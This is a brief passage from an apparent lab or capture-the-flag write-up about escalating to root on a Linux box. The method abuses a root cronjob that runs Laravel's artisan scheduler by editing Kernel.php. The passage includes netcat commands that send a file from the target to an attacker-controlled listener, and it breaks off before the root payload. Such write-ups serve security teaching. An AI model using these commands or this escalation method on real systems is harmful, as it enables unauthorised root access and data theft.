Post Exploitation

After gaining access, we were able to run LinEnum.sh on the system. Analyzing we were able to check results.

Privilege Elevation

Task Scheduling - Laravel 7.x - The PHP Framework For Web Artisanslaravel.com

After running LinEnum.sh, I was able to find an interesting cronjob.

* * * * *  root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Based on the documentation, we can create schedules in the /laravel/app/conosle/Kernel class.

You can schedule Shell commands with the exec method

You can modify frequency using certain schedule functions.

Transfering files with nc

On the target machine

www-data@cronos:/var/www/laravel/app/Console$ nc -nv [ip] [port] < Kernel.php

On the Kali machine

nc -nvlp [port] > File name

Modifying Kernel.php

code to be executed as root